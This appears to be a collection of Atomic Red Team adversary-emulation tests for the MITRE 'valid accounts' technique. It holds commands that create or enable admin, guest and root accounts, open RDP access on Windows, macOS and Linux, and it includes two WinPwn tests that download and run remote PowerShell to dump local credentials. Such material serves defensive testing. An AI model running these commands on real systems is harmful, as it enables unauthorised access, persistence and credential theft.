Atomic-初始化访问

1078.001

• Atomic Test #1 - Enable Guest account with RDP capability and admin privileges

• Atomic Test #2 - Activate Guest Account

• Atomic Test #3 - Enable Guest Account on macOS

---

Enable Guest account with RDP capability and admin privileges

net user #{guest_user} /active:yes
net user #{guest_user} #{guest_password}
net localgroup #{local_admin_group} #{guest_user} /add
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f

---

Activate Guest Account

net user #{guest_user} /active:yes

---

Enable Guest Account on macOS

sudo sysadminctl -guestAccount on

---

1078.003

• Atomic Test #1 - Create local account with admin privileges

• Atomic Test #2 - Create local account with admin privileges - MacOS

• Atomic Test #3 - Create local account with admin privileges using sysadminctl utility - MacOS

• Atomic Test #4 - Enable root account using dsenableroot utility - MacOS

• Atomic Test #5 - Add a new/existing user to the admin group using dseditgroup utility - macOS

• Atomic Test #6 - WinPwn - Loot local Credentials - powerhell kittie

• Atomic Test #7 - WinPwn - Loot local Credentials - Safetykatz

• Atomic Test #8 - Create local account (Linux)

• Atomic Test #9 - Reactivate a locked/expired account (Linux)

• Atomic Test #10 - Login as nobody (Linux)

---

Create local account with admin privileges

net user art-test /add
net user art-test #{password}
net localgroup administrators art-test /add

---

Create local account with admin privileges - MacOS

dscl . -create /Users/AtomicUser
dscl . -create /Users/AtomicUser UserShell /bin/bash
dscl . -create /Users/AtomicUser RealName "Atomic User"
dscl . -create /Users/AtomicUser UniqueID 503
dscl . -create /Users/AtomicUser PrimaryGroupID 503
dscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser
dscl . -passwd /Users/AtomicUser mySecretPassword
dscl . -append /Groups/admin GroupMembership AtomicUser

---

Create local account with admin privileges using sysadminctl utility - MacOS

sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin

---

Enable root account using dsenableroot utility - MacOS

dsenableroot #current user
dsenableroot -u art-tester -p art-tester -r art-root #new user

---

Add a new/existing user to the admin group using dseditgroup utility - macOS

dseditgroup -o edit -a art-user -t user admin

---

WinPwn - Loot local Credentials - powerhell kittie

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive

---

WinPwn - Loot local Credentials - Safetykatz

$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive

---

Create local account (Linux)

useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
su art
whoami
exit

---

Reactivate a locked/expired account (Linux)

useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
usermod --lock art
usermod --expiredate "1" art
usermod --unlock art
usermod --expiredate "99999" art
su art
whoami
exit

---

Login as nobody (Linux)

cat /etc/passwd |grep nobody 
# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
chsh --shell /bin/bash nobody
usermod --password $(openssl passwd -1 nobody) nobody
su nobody
whoami
exit

---